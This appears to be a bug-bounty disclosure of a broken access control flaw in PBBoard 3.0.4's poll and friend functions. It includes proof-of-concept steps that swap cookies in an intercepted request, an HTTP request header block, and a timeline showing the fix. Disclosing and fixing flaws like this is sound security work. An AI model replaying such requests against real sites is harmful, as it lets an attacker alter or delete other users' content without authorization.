Broken Access Control in Vote/Friend Function in pbboard/pbboard-3.0.4


Reported on

Apr 4th 2023


Unauthorized conduct by modifying, closing/re open a poll created by someone else. Delete friend of other account via id

Proof of Concept

Step 1: Use account 1 to create a poll
Example Image
account 2 not have perrmison edit/close/open on poll Example Image
Step 2: Intercept request when account 1 edit, close, open a poll with burpsuite

Example Image
Step 3: Change cookies account 2 to request of account 1

// PoC.js
POST /pbboard/index.php?page=vote&poll_start_edit=1&id=1&subject_id=8 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 124
Origin: http://localhost
Connection: close
Referer: http://localhost/pbboard/index.php?page=vote&poll_edit=1&id=1&subject_id=8&poll_section=2&user=xss
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1


Step 4: Reload and view change
Reload on account 2 Example Image
Reload on account 1 Example Image


Once a flaw is discovered, the consequences of a flawed access control scheme can be devastating. In addition to viewing unauthorized content, an attacker might be able to change or delete content, perform unauthorized functions, or even take over site administration

We are processing your report and will contact the pbboard/pbboard-3.0.4 team within 24 hours. 2 months ago
TuanTH modified the report
2 months ago
We have contacted a member of the pbboard/pbboard-3.0.4 team and are waiting to hear back 2 months ago
PBBoard Forum Software validated this vulnerability 2 months ago

bug was successfully fixed.

TuanTH has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
PBBoard Forum Software marked this as fixed in 3.0.4 with commit c202dd 2 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
PBBoard Forum Software published this vulnerability 2 months ago
vote.module.php#L165-L512 has been validated
2 months ago


I just checked the BAC error, tried changing the cookie in the request and still changing the name of the poll

2 months ago


Is there a video or images to explain!

2 months ago


Dear sulaiman0dawod, I checked lastest commit and this vulnerability was fixed when change the name of poll

to join this conversation